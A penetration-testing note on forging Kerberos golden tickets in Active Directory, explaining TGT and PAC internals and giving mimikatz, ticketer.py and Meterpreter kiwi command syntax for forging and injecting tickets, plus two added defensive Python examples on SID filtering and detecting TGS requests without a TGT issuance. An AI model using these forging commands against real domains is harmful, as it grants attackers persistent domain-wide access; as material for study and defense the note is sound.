# Post Exploitation - Kerberos golden tickets

### Overview

`Kerberos` is the authentication protocol used within Active Directory; it relies on tickets to identify users and grant access to domain resources. `Kerberos` implements two types of tickets, issued by two distinct services of the `Key Distribution Center (KDC)`:

* `Ticket-Granting Ticket (TGT)`, obtained from the `Authentication Service (AS)`
* `service tickets`, obtained from the `Ticket-Granting Service (TGS)`.

A `TGT` is generally requested by a user through a `KRB_AS_REQ` request to the `AS` of the `KDC` during the login process on a Windows system joined to an Active Directory domain. `TGTs` are encrypted using one of the secrets (the `RC4 key`, whose value is identical to the `NTLM` hash, or the `AES 128/256 bits keys`) of the domain's `krbtgt` account. After reception of the `TGT`, in a `KRB_AS_REP` response from the `KDC`, the `TGT` is stored in memory by the client in the `Kerberos Security Support Provider (SSP)` of the `Local Security Authority Subsystem Service (LSASS)` process.

A user's authentication data is stored, encrypted using one of the secrets of the `krbtgt` account, in the `Privilege Attribute Certificate (PAC)` of the `TGT` and includes:

* The `Domain SID` and the `User RID`, whose combination forms the user's current `Security Identifier (SID)`
* The `SIDs` kept in the user's `SIDHistory` attribute
* The `GROUP_MEMBERSHIP_ARRAY`, which contains the user's group memberships in the form of the groups' `Relative IDs (RIDs)`.

Whenever a `service ticket` is generated, the `TGT`'s `PAC` is decrypted by the `KDC`, signed using both one of the secrets of the `krbtgt` account (`KDC Signature`) and one of the secrets of the targeted service account (`Server Signature`), and ultimately encrypted using one of the secrets of the targeted service account.

`Golden tickets` are `TGTs` forged with arbitrary authentication data: the specified username, group `RIDs` and `SIDs` are added to the forged ticket's `PAC`. The `golden ticket` can be injected in the current user session and used to directly request `service tickets` from the `TGS`.

To generate a `golden ticket`, the following prerequisites are needed:

* The fully qualified domain name and the `SID` of the targeted domain.
* One of the secrets of the targeted domain `krbtgt` account. The `krbtgt` `RC4` key, corresponding to the `NTLM hash` of the `krbtgt` password, as well as the `AES 128/256 bits` keys can be used.

Note that while the user account specified for the `golden ticket` must be a member of the targeted domain, the arbitrary SIDs added in the SID history of the forged ticket (`ExtraSids` field of the `PAC`) can come from external domains or forests (for which trust relationships are configured).
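The following Python script is an added example, not part of the original notes: it models the authorization data a KDC derives from the `PAC` fields described above (`Domain SID` + `User RID`, `GROUP_MEMBERSHIP_ARRAY`, `ExtraSids` / SID history) and shows why SID filtering on a trust matters for the `ExtraSids` field. All SIDs used are constructed, the `Pac` class and function names are this example's own, and the filtering rule is a simplified assumption (a single trusted domain SID; a forest trust would accept every domain of the trusted forest).

```python
"""Added example (not part of the original notes): a small model of the
authorization data a KDC derives from the PAC fields discussed above
(Domain SID + User RID, GROUP_MEMBERSHIP_ARRAY, ExtraSids / SID history),
and of SID filtering applied to the ExtraSids received over a trust.
Sample SIDs are constructed; the filtering rule is a simplified assumption."""
import re
from dataclasses import dataclass, field

# A domain SID always has the S-1-5-21-<a>-<b>-<c> shape; a domain-relative
# SID is a domain SID followed by a RID.
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")

# Well-known RIDs worth naming when reviewing a PAC: 500 is the built-in
# Administrator account, the others are the group RIDs that mimikatz and
# ticketer.py put in a golden ticket by default (513, 512, 520, 518, 519).
WELL_KNOWN_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    513: "Domain Users",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}


@dataclass
class Pac:
    """The subset of PAC fields this example looks at (names from the notes)."""
    domain_sid: str
    user_id: int                                          # the user's RID
    group_ids: list[int]                                  # GROUP_MEMBERSHIP_ARRAY RIDs
    extra_sids: list[str] = field(default_factory=list)   # SID history entries


def split_sid(sid: str) -> tuple[str, int]:
    """Split 'S-1-5-21-a-b-c-<RID>' into (domain SID, RID); reject other shapes."""
    domain, _, rid = sid.rpartition("-")
    if not DOMAIN_SID_RE.match(domain) or not rid.isdigit():
        raise ValueError(f"not a domain-relative SID: {sid!r}")
    return domain, int(rid)


def effective_sids(pac: Pac) -> list[str]:
    """SIDs a service ends up with in the token built from this PAC:
    the user's SID, then its group SIDs, then the SID-history entries."""
    if not DOMAIN_SID_RE.match(pac.domain_sid):
        raise ValueError(f"not a domain SID: {pac.domain_sid!r}")
    sids = [f"{pac.domain_sid}-{pac.user_id}"]
    sids += [f"{pac.domain_sid}-{rid}" for rid in pac.group_ids]
    sids += list(pac.extra_sids)
    return sids


def sid_filter(extra_sids: list[str], trusted_domain_sid: str) -> tuple[list[str], list[str]]:
    """Simplified SID filtering (quarantine) on a trust: a SID-history entry is
    honored only if it belongs to the trusted domain itself; anything else,
    including SIDs that are not domain-relative, is dropped.  Assumption: a
    single trusted domain (a forest trust would accept every domain of the
    trusted forest).  Returns (kept, dropped)."""
    kept, dropped = [], []
    for sid in extra_sids:
        try:
            domain, _ = split_sid(sid)
        except ValueError:
            dropped.append(sid)
            continue
        (kept if domain == trusted_domain_sid else dropped).append(sid)
    return kept, dropped


def well_known_names(pac: Pac) -> dict[str, str]:
    """Map every effective SID whose RID is in WELL_KNOWN_RIDS to its name, so a
    reviewer sees at a glance which privileged identities a PAC asserts."""
    names = {}
    for sid in effective_sids(pac):
        _, rid = split_sid(sid)
        if rid in WELL_KNOWN_RIDS:
            names[sid] = WELL_KNOWN_RIDS[rid]
    return names


if __name__ == "__main__":
    # Constructed PAC with the tool defaults (RID 500, default groups) and one
    # Enterprise Admins SID of another constructed domain in ExtraSids.
    pac = Pac("S-1-5-21-1111-2222-3333", 500, [513, 512, 520, 518, 519],
              ["S-1-5-21-4444-5555-6666-519"])
    names = well_known_names(pac)
    for sid in effective_sids(pac):
        print(sid, names.get(sid, ""))
    kept, dropped = sid_filter(pac.extra_sids, "S-1-5-21-7777-8888-9999")
    print("kept:", kept, "dropped by SID filtering:", dropped)
```

The constructed PAC carries a foreign `Enterprise Admins` SID (RID 519) in its `ExtraSids`; without SID filtering it becomes part of the token, with filtering enabled on the trust it is dropped unless it belongs to the trusted domain itself.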

### Golden tickets generation

The `mimikatz` `kerberos::golden` module and `impacket`'s `ticketer.py` can be used to generate `golden tickets`.

The `golden ticket`'s:

* `UserId` (impersonated user's `RID`) can be specified using (`mimikatz`) `/id` / (`ticketer.py`) `-user-id` `<USER_ID>` and defaults to `500`.
* `GroupIds` (impersonated group memberships) can be specified using (`mimikatz`) `/groups` / (`ticketer.py`) `-groups` `<GROUP_RID | GROUP_RID1, ..., GROUP_RIDN>` and defaults to `513, 512, 520, 518, 519`.
* `ExtraSids` (impersonated user's `SID History`) can be specified using (`mimikatz`) `/sids` / (`ticketer.py`) `-extra-sid` `<EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN>`.

```
# Retrieves the domain FQDN and SID.
Get-ADDomain | Ft DNSRoot, DomainSID

# [Windows] Golden tickets generation using mimikatz.
# The generated ticket can be directly injected in the current session using the "/ptt" option.
# Otherwise the golden ticket is exported in the KRB_CRED format (KIRBI file on disk).
mimikatz # kerberos::golden /user:<USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> [/rc4:<KRBTGT_NTLM> | /aes128:<KRBTGT_AES128> | /aes256:<KRBTGT_AES256>] [/groups:<RID | RID_LIST>] [/sids:<EXTRA_SID | EXTRA_SIDS_LIST>]

# [Linux / Windows] Golden tickets generation using ticketer.py.
# The generated ticket is exported in the credential cache (ccache) format.
ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] <USERNAME>
ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] -user-id <500 | USER_ID> -groups <GROUP_RID | GROUP_RID1, ..., GROUP_RIDN> -extra-sid <EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN> <USERNAME>
```

**mimikatz with Metasploit**

`mimikatz` 2.0 is available in a `meterpreter` shell as the `Kiwi` extension.

The following command can be used to load the extension in memory in a `meterpreter` shell: `use kiwi`

Once the extension has been loaded, the `golden_ticket_create` command can be used to create a golden ticket:

```
golden_ticket_create -d '<FQDN_DOMAIN>' -s '<SID_DOMAIN>' -k '<KRBTGT_HASH>' -u '<USERNAME>' -t '<FULL_SAVE_PATH>'

Usage: golden_ticket_create [options]
OPTIONS:
    -d <opt>  FQDN of the target domain (required)
    -g <opt>  Comma-separated list of group identifiers to include (eg: 501,502)
    -h        Help banner
    -i <opt>  ID of the user to associate the ticket with
    -k <opt>  krbtgt domain user NTLM hash
    -s <opt>  SID of the domain
    -t <opt>  Local path of the file to store the ticket in (required)
    -u <opt>  Name of the user to create the ticket for (required)
```

Tickets can be loaded/purged using the `kerberos_ticket_use` and `kerberos_ticket_purge` commands:

```
kerberos_ticket_use <FULL_SAVE_PATH>
kerberos_ticket_purge
```

### Golden tickets usage (Pass-the-Ticket)

On Windows, `golden tickets` generated using `mimikatz` are automatically injected in the current logon session if the `/ptt` option is specified. Otherwise, an exported `golden ticket` can be injected using `mimikatz.exe "kerberos::ptt <TICKET_FILE_PATH>"` for example.

On Linux, `golden tickets` in the `credential cache (ccache)` format can be referenced through the `KRB5CCNAME` environment variable for further use by tools supporting the `Kerberos` protocol, such as the `Impacket` Python utilities.

Refer to the `[ActiveDirectory] Kerberos tickets usage` note for more information on techniques and tools to leverage `golden tickets`.
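The following Python script is an added detection example, not part of the original notes. It builds on the point made in the overview that a `golden ticket` is forged offline and used directly against the `TGS`: a legitimate `TGT` is issued by the `AS`, which a domain controller logs as Windows security event 4768, whereas a forged one never is and therefore only surfaces as service ticket requests (event 4769) with no matching 4768 for that account. The event lines are constructed summaries, the field layout and function names are this example's own, and the 10 hour window assumes the default maximum `TGT` lifetime of a domain.

```python
"""Added example (not part of the original notes): flag TGS requests (event
4769) for accounts that show no TGT issuance (event 4768) on any domain
controller in the preceding ticket lifetime.  The events are constructed
summaries, not real logs."""
from datetime import datetime, timedelta

# Constructed sample: one line per event collected from every domain controller,
# fields: time | DC | event id | account | client address.
SAMPLE_EVENTS = """\
2024-05-01T08:00:00|DC01|4768|alice|10.0.0.15
2024-05-01T08:00:02|DC01|4769|alice|10.0.0.15
2024-05-01T08:05:00|DC02|4769|alice|10.0.0.15
2024-05-01T09:30:00|DC01|4769|Administrator|10.0.0.77
2024-05-01T09:31:00|DC02|4769|Administrator|10.0.0.77
"""

# Default maximum TGT lifetime in an AD domain is 10 hours (assumption: the
# domain policy was not changed); a 4768 older than that cannot have produced
# the TGT behind a later 4769, renewals aside.
DEFAULT_TGT_LIFETIME = timedelta(hours=10)


def parse_events(text: str) -> list[dict]:
    """Parse the pipe-separated summaries into dicts with a datetime 'time'.
    Account names are lower-cased so that 4768/4769 entries match regardless
    of how each DC rendered them."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        time, dc, event_id, account, client = line.split("|")
        events.append({"time": datetime.fromisoformat(time), "dc": dc,
                       "event_id": int(event_id), "account": account.lower(),
                       "client": client})
    return events


def tgs_without_as(events: list[dict], window: timedelta = DEFAULT_TGT_LIFETIME) -> list[dict]:
    """Return the 4769 events for which no 4768 for the same account was seen
    on any DC within `window` before the request.  Caveats: every DC's log
    must be present in `events`, otherwise TGTs issued by an uncollected DC
    are flagged too; TGT renewals (event 4770) extend a ticket's life beyond
    `window`; a failed 4768 (audit failure) is not distinguished here."""
    as_times: dict[str, list[datetime]] = {}
    for ev in events:
        if ev["event_id"] == 4768:
            as_times.setdefault(ev["account"], []).append(ev["time"])
    flagged = []
    for ev in events:
        if ev["event_id"] != 4769:
            continue
        t = ev["time"]
        backed = any(t - window <= t_as <= t for t_as in as_times.get(ev["account"], []))
        if not backed:
            flagged.append(ev)
    return flagged


if __name__ == "__main__":
    for ev in tgs_without_as(parse_events(SAMPLE_EVENTS)):
        print(f"{ev['time']} {ev['dc']}: TGS request for {ev['account']} "
              f"from {ev['client']} without a preceding TGT issuance")
```

In the constructed sample `alice` obtained a `TGT` through the `AS` before requesting service tickets, so her requests are backed by a 4768; the two requests for `Administrator` have no 4768 anywhere and are the ones reported.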

***

### References

* <https://2014.rmll.info/slides/80/day_3-1010-Benjamin_Delpy-Mimikatz_a_short_journey_inside_the_memory_of_the_Windows_Security_service.pdf>
* <https://adsecurity.org/?page_id=1821>
* Kerberos-based Active Directory persistence techniques (TECHNIQUES DE PERSISTANCE ACTIVE DIRECTORY BASÉES SUR KERBEROS) - MISC Hors-Série N°20
* <https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html>

